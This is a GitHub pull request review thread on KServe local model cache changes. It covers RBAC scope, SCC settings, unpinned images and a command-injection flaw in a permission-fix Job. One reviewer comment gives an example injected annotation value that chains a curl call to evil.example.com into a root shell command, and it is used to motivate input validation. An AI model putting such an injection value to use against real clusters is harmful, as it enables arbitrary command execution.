groups=core,resources=persistentvolumes and persistentvolumeclaims in
controller.go) so the agent no longer gets cluster-scoped PV/PVC mutation
permissions; instead grant only namespace-scoped PVC permissions via a Role in
the model-cache namespace (move any PVC rights into the Role manifest under your
rbac/ or config/roles manifests) and extract any PV lifecycle handling to a
separate, tightly-scoped controller or operator with its own ClusterRole if
truly required.
- Around line 691-729: The job currently interpolates mcsLevel directly into a
shell string (chconCmd) and into the container Command in the fix-permissions
Container, which can lead to command injection; validate mcsLevel against a
strict MCS token pattern (allow only the exact expected character set/format for
SELinux MCS labels) before using it and reject/ignore any non-matching values,
or eliminate the shell by constructing the container command without sh -c (pass
chown and chcon as argument lists and separate args for the level and path).
Update the code that builds chconCmd, selinuxLevel and the Container Command
(variables: mcsLevel, chconCmd, selinuxLevel, and the Job/Container spec for
"fix-permissions") to perform the validation or to use exec-style args instead
of string interpolation into "sh -c".
- Around line 500-503: Move the ConfigMap resolution that sets jobNamespace to
run before calling cleanupJobs() so cleanupJobs() never executes with the
zero-value namespace; specifically, ensure the code that reads the
ConfigMap/variable that populates jobNamespace (the same logic that is currently
executed after cleanupJobs()) is run first, then call cleanupJobs(ctx, c,
localModelNode) (or the existing call site). Add a validation check after
resolving jobNamespace that it is non-empty (if jobNamespace == "" return an
error and stop processing) and update any calls that build the label-scoped list
(the c.List call that uses client.InNamespace(jobNamespace) and labelSelector
{"node": localModelNode.Name}) to rely on the validated jobNamespace to prevent
cross-namespace deletions.
- Around line 198-202: Replace the current unconditional use of
getProcessMCSLevel() (used when setting podSecurityContext.SELinuxOptions and in
the permission-fix job block) with logic that first fetches the target
namespace's SELinux MCS annotation ("openshift.io/sa.scc.mcs") for the
jobNamespace and uses that when present; only if that annotation is
missing/empty should you fall back to the controller process label returned by
getProcessMCSLevel(), and only use that fallback if it is actually appropriate
for the target namespace (i.e., validate equality/compatibility with the
namespace annotation when possible or treat it as
last-resort/SELinux-unavailable fallback). Update both the podSecurityContext
assignment site and the permission-fix job handling (the block referencing
getProcessMCSLevel() around podSecurityContext.SELinuxOptions and the code at
the permission-fix job path) to perform this lookup and conditional fallback
using the namespace object’s annotations.

In `@pkg/controller/v1alpha1/localmodelnode/file_utils_test.go`:
- Around line 153-171: The test TestFileSystemHelper_isWritable relies on chmod
to create an unwritable dir which is UID-dependent; modify the test to detect
running as root (os.Geteuid()==0) and skip the read-only branch or use an
injected failure instead. Specifically, in TestFileSystemHelper_isWritable
(which constructs NewFileSystemHelper and calls isWritable), add a guard before
changing permissions: if running as root, call t.Skipf to skip the read-only
chmod/assertion branch; alternatively, refactor to inject a failing filesystem
or mock into NewFileSystemHelper so isWritable can be exercised without relying
on real permission bits.
- Around line 117-119: The test currently sets modelsRoot := tempDir which
points to an existing directory and thus never exercises the MkdirAll path;
update the setup in file_utils_test.go to use a non-existent child path (e.g.
join tempDir with a new subdirectory name) before calling NewFileSystemHelper so
Case 1 creates the folder; reference the modelsRoot variable and
NewFileSystemHelper in your change and add filepath.Join or equivalent to form
the child path (and import filepath if needed).

In `@pkg/controller/v1alpha1/localmodelnode/file_utils.go`:
- Line 31: Change isWritable() to return (bool, error) instead of bool; have the
function run the probe and return true,nil on success, false,os.PathError (or
the specific permission error) when permission-denied, and false,err for other
filesystem/mount/disk errors so callers can distinguish causes; update callers
(e.g., the Reconcile flow that currently treats a false as always requiring a
permission fix) to inspect the returned error and only enqueue/trigger the
permission-fix job when the error indicates a permission/SELinux denial, while
treating other errors (mount missing, read-only FS, ENOSPC) as different failure
paths or transient errors. Also apply the same signature and caller updates for
the related probe routines mentioned around lines 82-90 so all permission vs
non-permission failures are surfaced to the reconciler.

---

Outside diff comments:
In `@charts/kserve-localmodel-resources/files/resources.yaml`:
- Around line 126-135: The ClusterRole kserve-localmodelnode-agent-role
currently allows cluster-wide get/list/watch on secrets; restrict this by either
(A) converting this ClusterRole into a namespaced Role in resources.yaml scoped
to the reconciler's jobNamespace (the namespace used by
LocalModelNodeReconciler) and update the corresponding RoleBinding to bind in
that namespace, or (B) keep it as a ClusterRole but replace the broad "secrets"
resource permission with a resourceNames list containing only the specific
secret names the controller reads (derived from jobNamespace configuration),
ensuring verbs remain limited to get/list/watch. Locate
kserve-localmodelnode-agent-role in resources.yaml and apply one of these fixes
and adjust bindings accordingly.

In `@config/localmodelnodes/manager.yaml`:
- Around line 65-69: The hostPath volume under volumes with hostPath.path
"/models" and readOnly false introduces a container escape risk; replace it with
a PVC-backed volume (use the existing localmodelnode-pv-pvc.yaml pattern) and
mount that PVC instead of hostPath, or if hostPath is absolutely required, make
the mount readOnly, add explicit path restrictions via OpenShift
SCC/PodSecurityPolicy, and document the security rationale; update the volume
declaration and any references to the "models" volume accordingly (e.g., in the
pod spec that mounts "models").

In `@localmodel-agent.Dockerfile`:
- Around line 22-25: The Dockerfile currently installs go-licenses with an
unpinned reference ("go install github.com/google/go-licenses@latest"), which
allows supply-chain changes and breaks reproducibility; change that invocation
to a pinned, immutable version (replace `@latest` with a specific release tag or
module version/commit hash) and rebuild using that pinned version so the
subsequent uses of /opt/app-root/src/go/bin/go-licenses (the check and save
commands) run a known, fixed binary; ensure the chosen tag is a stable release
(e.g., a vX.Y.Z tag or commit SHA) and update any documentation or build notes
to document the pinned version.

In `@localmodel.Dockerfile`:
- Around line 22-25: The Dockerfile currently installs go-licenses with an
unpinned version ("go install github.com/google/go-licenses@latest"); replace
`@latest` with a specific, audited release tag or commit hash (e.g., a vX.Y.Z tag
or a commit SHA) so the build is reproducible and not vulnerable to supply-chain
changes; update the installation line that produces
/opt/app-root/src/go/bin/go-licenses and any related build docs to reference the
chosen pinned version and, if desired, add a short comment with the upstream
release URL or checksum for future audits.

In `@pkg/controller/v1alpha1/localmodel/controller_test.go`:
- Around line 914-948: The test currently moves the download PVC into
modelCacheNamespace (pvcLookupKey) but only asserts the CR deletion, so it
doesn't verify the PVC was cleaned up; after deleting cachedModel and asserting
the CR is gone, add an Eventually assertion that attempts to Get the PVC via
pvcLookupKey (persistentVolumeClaim) and expects errors.IsNotFound(err) to be
true, ensuring the PVC is deleted; use the same timeout/interval and
k8sClient.Get(ctx, pvcLookupKey, persistentVolumeClaim) pattern as earlier to
avoid race conditions.

In `@python/kserve/kserve/models/v1beta1_local_model_config.py`:
- Around line 71-99: The constructor V1beta1LocalModelConfig.__init__ currently
places the parameter permission_fix_image before reconcilation_frequency_in_secs
which breaks positional-argument compatibility; reorder the parameters so
reconcilation_frequency_in_secs appears before permission_fix_image in the
method signature and move the corresponding conditional assignment block (the if
reconcilation_frequency_in_secs ... and if permission_fix_image ...) so
reconcilation_frequency_in_secs is checked/assigned prior to
permission_fix_image, ensuring the attribute names
_reconcilation_frequency_in_secs and _permission_fix_image (and their public
setters default_job_image, disable_volume_management, enabled, fs_group,
job_namespace, job_ttl_seconds_after_finished) remain unchanged.

---

Nitpick comments:
In `@charts/kserve-localmodel-resources/files/resources.yaml`:
- Around line 394-409: The DaemonSet currently uses a hostPath volume named
"models" mounted at /var/lib/kserve (and serviceAccountName
kserve-localmodelnode-agent), which can be unsafe for production; add a clear
inline YAML comment next to the volumes/mount (or a short note in chart README)
that this hostPath is intended for local/dev use only and that
production/OpenShift deployments should use the odh-with-modelcache overlay
(which replaces the hostPath with a PVC) or supply their own persistent storage;
ensure the comment references the "models" volume name and the mountPath
/var/lib/kserve so maintainers know exactly what to replace.

In `@config/overlays/odh-with-modelcache/localmodel-scc.yaml`:
- Around line 19-20: Replace the permissive seLinuxContext type value "RunAsAny"
with a stricter setting by updating the seLinuxContext block to use "MustRunAs"
and specify an appropriate SELinux type (for example "container_runtime_t" or
another cluster-approved type); locate the seLinuxContext section and change the
type field accordingly so the SCC enforces the chosen SELinux context instead of
allowing any.

In `@pkg/apis/serving/v1beta1/configmap.go`:
- Around line 391-400: The NewLocalModelConfig function returns raw JSON
unmarshal errors while sibling constructors like NewIngressConfig wrap errors
with context; update NewLocalModelConfig to wrap the error from json.Unmarshal
with a descriptive message (include LocalModelConfigName and that it failed to
parse into LocalModelConfig) before returning so callers get context, mirroring
the error-wrapping pattern used by NewIngressConfig and other New*Config
functions.
- Line 172: Add validation for the PermissionFixImage field after unmarshalling
by implementing a validateContainerImageRef(image string) error helper and
invoking it in NewLocalModelConfig to reject unsafe image references and enforce
an allowlist of permitted registries; specifically, have
validateContainerImageRef return nil for empty (optional) values, reject
whitespace or control characters and other unsafe characters, verify the
registry host is in your allowlist, and propagate/return an error from
NewLocalModelConfig if validation fails so callers can refuse untrusted
ConfigMap input.

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`:
- Around line 116-130: The CreatePV/CreatePVC calls log errors but continue,
leaving partial state; change the reconciler to propagate failures by returning
the error (instead of only logging) so the controller will requeue and retry;
specifically, in the block that calls CreatePV(ctx, c.Clientset, c.Scheme,
c.Log, pv, nil, localModel) and the subsequent CreatePVC(ctx, c.Clientset,
c.Scheme, c.Log, pvc, localModelConfig.JobNamespace, nil, localModel) handle
non-nil err by returning that err (or a wrapped contextual error including
pv.Name/pvc.Name) from the reconcile function so the operation is aborted and
retried rather than proceeding.
- Line 128: The code calls CreatePVC with localModelConfig.JobNamespace without
validating it; add a defensive check before that call in the reconciler to
ensure localModelConfig.JobNamespace is non-empty and a valid namespace (e.g.,
if empty, either set it to localModel.Namespace or return an error), and if
invalid return/record a clear error (use c.Log.Errorf or return fmt.Errorf)
rather than proceeding to CreatePVC; update imports to include fmt if you use
fmt.Errorf.
- Around line 106-108: The call to ReconcileLocalModelNode currently logs errors
but does not stop reconciliation, allowing downstream PV/PVC creation to run
even on failure; change the block in localmodelnamespacecache_reconciler.go so
that if ReconcileLocalModelNode(ctx, c.Client, c.Log, nil, localModel,
nodeGroups) returns an error you both log it and return the error (or wrap it)
from the surrounding reconcile method instead of continuing, ensuring the
reconcile function (the caller) stops and propagates the failure.

In `@pkg/controller/v1alpha1/localmodelnode/controller_test.go`:
- Around line 1456-1539: The test only exercises the non-SELinux fallback
because getProcessMCSLevel() reads /proc and can't be controlled in envtest;
make the MCS reader injectable by refactoring getProcessMCSLevel into a function
variable or dependency (e.g., add a field mcsReader func() (string, error) on
the reconciler or a package-level var getProcessMCSLevelFunc) and use that in
the code path that builds the permission-fix Job, then update the test "Should
include MCS level in permission fix job chcon command" to set the injected
reader to return a non-empty value like "s0:c28,c27" (and restore it after the
test) so the Job command includes "-l <mcs>" and the test exercises the SELinux
branch.

In `@pkg/controller/v1alpha1/localmodelnode/file_utils.go`:
- Around line 82-90: Replace the fixed probe file in FileSystemHelper.isWritable
with a randomized temp file: use os.CreateTemp(f.modelsRootFolder,
".write-test-*") to create the temp file (capture file and err), close and
remove it, and return false on any error; update the function name reference
(isWritable on FileSystemHelper) accordingly and ensure cleanup happens even on
close/remove errors so concurrent probes won't conflict.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Central YAML (base), Organization UI (inherited)

Review profile: CHILL

Plan: Pro

Run ID: 4c553d02-f14f-44d3-8d34-abfe6a02d65d

📥 Commits

Reviewing files that changed from the base of the PR and between c9f1a9f and 5560526.

📒 Files selected for processing (35)
  • charts/kserve-localmodel-resources/files/resources.yaml
  • config/localmodelnodes/manager.yaml
  • config/overlays/odh-with-modelcache/kustomization.yaml
  • config/overlays/odh-with-modelcache/localmodel-permissions-scc.yaml
  • config/overlays/odh-with-modelcache/localmodel-scc.yaml
  • config/overlays/odh-with-modelcache/localmodelnode-pv-pvc.yaml
  • config/overlays/odh-with-modelcache/openshift-ca-patch.yaml
  • config/overlays/odh-with-modelcache/openshift-serving-cert-localmodel-patch.yaml
  • config/overlays/odh-with-modelcache/remove-localmodel-cert-manager.yaml
  • config/overlays/odh/kustomization.yaml
  • config/overlays/odh/params.env
  • config/overlays/odh/params.yaml
  • config/overlays/odh/patches/inferenceservice-config-patch.yaml
  • config/overlays/odh/patches/remove-storagecontainer.yaml
  • config/rbac/localmodel/role.yaml
  • config/rbac/localmodelnode/role.yaml
  • localmodel-agent.Dockerfile
  • localmodel.Dockerfile
  • pkg/apis/serving/v1beta1/configmap.go
  • pkg/apis/serving/v1beta1/configmap_test.go
  • pkg/controller/v1alpha1/localmodel/controller.go
  • pkg/controller/v1alpha1/localmodel/controller_test.go
  • pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go
  • pkg/controller/v1alpha1/localmodel/reconcilers/utils.go
  • pkg/controller/v1alpha1/localmodelnode/controller.go
  • pkg/controller/v1alpha1/localmodelnode/controller_test.go
  • pkg/controller/v1alpha1/localmodelnode/file_utils.go
  • pkg/controller/v1alpha1/localmodelnode/file_utils_test.go
  • pkg/controller/v1beta1/inferenceservice/rawkube_controller_test.go
  • pkg/openapi/openapi_generated.go
  • pkg/openapi/swagger.json
  • pkg/webhook/admission/pod/storage_initializer_injector.go
  • pkg/webhook/admission/pod/storage_initializer_injector_test.go
  • python/kserve/docs/V1beta1LocalModelConfig.md
  • python/kserve/kserve/models/v1beta1_local_model_config.py
💤 Files with no reviewable changes (1)
  • pkg/controller/v1beta1/inferenceservice/rawkube_controller_test.go

Comment on lines +10 to +36
allowPrivilegeEscalation: true
allowPrivilegedContainer: false
allowedCapabilities:
- CHOWN
- DAC_OVERRIDE
- FOWNER
defaultAddCapabilities: null
fsGroup:
type: RunAsAny
readOnlyRootFilesystem: true
requiredDropCapabilities:
- FSETID
- KILL
- MKNOD
- NET_BIND_SERVICE
- NET_RAW
- SETFCAP
- SETGID
- SETPCAP
- SETUID
- SYS_CHROOT
runAsUser:
type: RunAsAny
seLinuxContext:
type: RunAsAny
supplementalGroups:
type: RunAsAny
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Major: tighten this SCC before binding it.

allowPrivilegeEscalation: true plus runAsUser, fsGroup, supplementalGroups, and seLinuxContext all set to RunAsAny gives any workload that can use this SCC broad control over mounted volumes. If that ServiceAccount is compromised, an attacker can start a pod with arbitrary UID/GID/SELinux labels and CHOWN/DAC_OVERRIDE/FOWNER against PVC contents (CWE-250, CWE-732). Drop allowPrivilegeEscalation, keep the binding dedicated to the permission-fix ServiceAccount, and narrow the admitted UID/GID/SELinux strategies to the exact values this job needs.

As per coding guidelines, **: Security vulnerabilities (provide severity, exploit scenario, and remediation code).

namespace: opendatahub

patches:
- path: patches/remove-storagecontainer.yaml
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Move this delete patch out of the shared ODH overlay.

Wiring patches/remove-storagecontainer.yaml into config/overlays/odh makes every ODH install delete the cluster-scoped ClusterStorageContainer/default, which changes storage resolution for all KServe users on the cluster, not just the modelcache/OpenShift path in this PR. Scope this to the modelcache-specific overlay instead.

Suggested change
 patches:
-- path: patches/remove-storagecontainer.yaml
 - path: patches/remove-namespace.yaml
 - path: patches/remove-cert-manager.yaml

Add the delete patch only in the modelcache-specific overlay that needs this behavior.

As per coding guidelines, **: REVIEW PRIORITIES: 2. Architectural issues and anti-patterns.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/odh/kustomization.yaml` at line 19, The delete patch
patches/remove-storagecontainer.yaml is placed in the shared ODH overlay (odh)
and will delete ClusterStorageContainer/default for every ODH install; remove
the reference from the odh kustomization and add that single delete entry to the
modelcache-specific overlay's kustomization instead so the patch only applies
when the modelcache overlay is selected (update the odh kustomization to drop
the path and add the path to the modelcache overlay kustomization).

@@ -1,4 +1,4 @@
kserve-controller=quay.io/opendatahub/kserve-controller:latest
kserve-controller=quay.io/vedantm/kserve-controller:latest
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Personal registry image should not be merged to master.

quay.io/vedantm/kserve-controller:latest replaces the official opendatahub image. This introduces:

  1. Supply chain risk - personal registries lack organizational security controls.
  2. Non-reproducible builds with :latest tag.

Replace with official quay.io/opendatahub/kserve-controller image before merge.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/odh/params.env` at line 1, The env entry currently sets
kserve-controller to a personal, unpinned image
"quay.io/vedantm/kserve-controller:latest"; update the value for the
kserve-controller variable to use the official registry image
"quay.io/opendatahub/kserve-controller" and avoid the :latest tag (prefer a
specific released tag) so the line becomes
kserve-controller=quay.io/opendatahub/kserve-controller[:<release-tag>] ensuring
the official image and a fixed tag are used.

Comment on lines +500 to 503
for _, ns := range []string{jobNamespace} {
jobs := &batchv1.JobList{}
labelSelector := map[string]string{"node": localModelNode.Name}
if err := c.List(ctx, jobs, client.InNamespace(ns), client.MatchingLabels(labelSelector)); err != nil {
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

# First, let's locate and examine the file
find . -type f -name "controller.go" | grep -i localmodelnode

Repository: opendatahub-io/kserve

Length of output: 119


🏁 Script executed:

# Let's examine the file size and read the relevant sections
wc -l ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 123


🏁 Script executed:

# Read the section around lines 500-520 to understand the cleanupJobs call
sed -n '490,530p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1715


🏁 Script executed:

# Now let's find where cleanupJobs is called - look for the reconciliation function
sed -n '450,600p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 6003


🏁 Script executed:

# Continue reading to see where cleanupJobs is called in the Reconcile function
sed -n '560,650p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 3681


🏁 Script executed:

# Let's find where jobNamespace is declared - look at the top of the file for global variables
head -50 ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 2295


🏁 Script executed:

# Look for global variable declarations, specifically jobNamespace
sed -n '50,150p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 4276


🏁 Script executed:

# Let's verify the exact line numbers where jobNamespace is set and used
grep -n "jobNamespace" ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1085


🏁 Script executed:

# Let's confirm the flow - read lines 590-630 to see the exact sequence
sed -n '590,630p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1760


🏁 Script executed:

# Let's check what happens at line 615 and after to see if there's validation
sed -n '615,625p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 549


🏁 Script executed:

# Let's examine the actual cleanupJobs function and see the exact impact of using empty jobNamespace
sed -n '494,525p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1490


Critical: Load jobNamespace before calling cleanupJobs().

On cold start, jobNamespace remains the zero value ("") when cleanupJobs() executes. The Job list at line 502 uses client.InNamespace(""), which fails to scope the namespace filter properly. This allows jobs with matching node=<name> labels to be deleted across all namespaces instead of only the configured jobNamespace, enabling unauthorized deletion of resources (CWE-284). Move the ConfigMap resolution to before cleanupJobs() and add validation that jobNamespace is not empty; fail closed if missing.

Suggested fix
-	// 2. Cleanup jobs for models that are not in the spec
-	if err := c.cleanupJobs(ctx, localModelNode); err != nil {
-		c.Log.Error(err, "Job cleanup err")
-		return reconcile.Result{}, err
-	}
-
-	// 3. Kick off download jobs for all models in spec
 	isvcConfigMap, err := v1beta1.GetInferenceServiceConfigMap(ctx, c.Clientset)
 	if err != nil {
 		c.Log.Error(err, "unable to get configmap", "name", constants.InferenceServiceConfigMapName, "namespace", constants.KServeNamespace)
 		return reconcile.Result{}, err
 	}
@@
 	jobNamespace = localModelConfig.JobNamespace
+	if jobNamespace == "" {
+		return reconcile.Result{}, fmt.Errorf("localModel.jobNamespace must not be empty")
+	}
+
+	// 2. Cleanup jobs for models that are not in the spec
+	if err := c.cleanupJobs(ctx, localModelNode); err != nil {
+		c.Log.Error(err, "Job cleanup err")
+		return reconcile.Result{}, err
+	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/controller.go` around lines 500 - 503,
Move the ConfigMap resolution that sets jobNamespace to run before calling
cleanupJobs() so cleanupJobs() never executes with the zero-value namespace;
specifically, ensure the code that reads the ConfigMap/variable that populates
jobNamespace (the same logic that is currently executed after cleanupJobs()) is
run first, then call cleanupJobs(ctx, c, localModelNode) (or the existing call
site). Add a validation check after resolving jobNamespace that it is non-empty
(if jobNamespace == "" return an error and stop processing) and update any calls
that build the label-scoped list (the c.List call that uses
client.InNamespace(jobNamespace) and labelSelector {"node":
localModelNode.Name}) to rely on the validated jobNamespace to prevent
cross-namespace deletions.

Comment on lines +691 to +729
chconCmd := "chcon -R -t container_file_t " + MountPath
if mcsLevel != "" {
chconCmd = fmt.Sprintf("chcon -R -t container_file_t -l %s %s", mcsLevel, MountPath)
}

selinuxLevel := "s0"
if mcsLevel != "" {
selinuxLevel = mcsLevel
}

job := &batchv1.Job{
ObjectMeta: metav1.ObjectMeta{
GenerateName: jobName,
Namespace: jobNamespace,
Labels: fixLabels,
},
Spec: batchv1.JobSpec{
TTLSecondsAfterFinished: &permFixTTL,
BackoffLimit: ptr.To(int32(0)),
Template: corev1.PodTemplateSpec{
Spec: corev1.PodSpec{
ServiceAccountName: "kserve-localmodelnode-agent",
NodeName: nodeName,
RestartPolicy: corev1.RestartPolicyNever,
SecurityContext: &corev1.PodSecurityContext{
SELinuxOptions: &corev1.SELinuxOptions{
Type: "spc_t",
Level: selinuxLevel,
},
},
Containers: []corev1.Container{
{
Name: "fix-permissions",
Image: permissionFixImage,
Command: []string{
"sh", "-c",
fmt.Sprintf("chown -R %d:%d %s && %s",
os.Getuid(), os.Getgid(), MountPath, chconCmd),
},
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Major: validate mcsLevel before embedding it in sh -c.

mcsLevel is interpolated straight into a root shell command. A malformed or unexpected value from namespace annotations or /proc/self/attr/current turns this into command injection inside the permission-fix Job (CWE-78). Validate against a strict MCS regex before constructing the command, or stop using sh -c here.

As per coding guidelines, **/*.go: Validate inputs before exec.Command (prevent command injection).

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/controller.go` around lines 691 - 729,
The job currently interpolates mcsLevel directly into a shell string (chconCmd)
and into the container Command in the fix-permissions Container, which can lead
to command injection; validate mcsLevel against a strict MCS token pattern
(allow only the exact expected character set/format for SELinux MCS labels)
before using it and reject/ignore any non-matching values, or eliminate the
shell by constructing the container command without sh -c (pass chown and chcon
as argument lists and separate args for the level and path). Update the code
that builds chconCmd, selinuxLevel and the Container Command (variables:
mcsLevel, chconCmd, selinuxLevel, and the Job/Container spec for
"fix-permissions") to perform the validation or to use exec-style args instead
of string interpolation into "sh -c".

Comment on lines 117 to 119
tempDir := t.TempDir()
modelsRoot := filepath.Join(tempDir, "models")
modelsRoot := tempDir
helper := NewFileSystemHelper(modelsRoot)
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

This case no longer exercises folder creation.

modelsRoot := tempDir points at a directory that already exists, so “Case 1” stops testing the MkdirAll path despite the comment saying otherwise. Use a child path under tempDir here.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/file_utils_test.go` around lines 117 -
119, The test currently sets modelsRoot := tempDir which points to an existing
directory and thus never exercises the MkdirAll path; update the setup in
file_utils_test.go to use a non-existent child path (e.g. join tempDir with a
new subdirectory name) before calling NewFileSystemHelper so Case 1 creates the
folder; reference the modelsRoot variable and NewFileSystemHelper in your change
and add filepath.Join or equivalent to form the child path (and import filepath
if needed).

@VedantMahabaleshwarkar
Copy link
Author

/hold need to change controller image after initial approval

@VedantMahabaleshwarkar
Copy link
Author

Go test failures seem unrelated to the changes (InferenceGraph failures), and I also cannot reproduce locally. make test passes locally 🤔

@VedantMahabaleshwarkar
Copy link
Author

/retest-required

@openshift-ci
Copy link

openshift-ci bot commented Mar 12, 2026

@VedantMahabaleshwarkar: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name Commit Details Required Rerun command
ci/prow/e2e-raw 5560526 link true /test e2e-raw
ci/prow/e2e-graph 5560526 link true /test e2e-graph
ci/prow/e2e-predictor 5560526 link true /test e2e-predictor

Full PR test history. Your PR dashboard.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

Comment on lines +691 to +694
chconCmd := "chcon -R -t container_file_t " + MountPath
if mcsLevel != "" {
chconCmd = fmt.Sprintf("chcon -R -t container_file_t -l %s %s", mcsLevel, MountPath)
}
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The mcsLevel value is interpolated directly into a shell command via sh -c + fmt.Sprintf without any input validation. When sourced from the namespace annotation fallback (openshift.io/sa.scc.mcs at line 578), this is user-writable content. A malicious annotation like s0:c1,c2 ; curl http://evil.example.com # would execute arbitrary commands as root inside a spc_t container.

The /proc/self/attr/current source is kernel-controlled and safe, but the namespace annotation fallback is not.

We should either validate the MCS level with a strict regex, or avoid sh -c entirely by using exec-form commands:

import "regexp"

  var validMCSLevel = regexp.MustCompile(`^s\d+(-s\d+)?(:(c\d{1,4})(,c\d{1,4})*)*$`)

  func sanitizeMCSLevel(level string) string {
      level = strings.TrimSpace(level)
      if validMCSLevel.MatchString(level) {
          return level
      }
      return ""
  }

Apply sanitizeMCSLevel() to both sources (line 570 getProcessMCSLevel() return and line 578 namespace annotation). Even better, replace sh -c with exec-form or two init containers (one for chown, one for chcon) so shell metacharacters are never interpreted.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@ugiordan replaced this PR with #1220 to better isolate the openshift specific changes and contribute the rest upstream. I re-opened your comments there, I've already made the changes to address them

@VedantMahabaleshwarkar
Copy link
Author

replaced by #1220

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

Status: Done

Development

Successfully merging this pull request may close these issues.

2 participants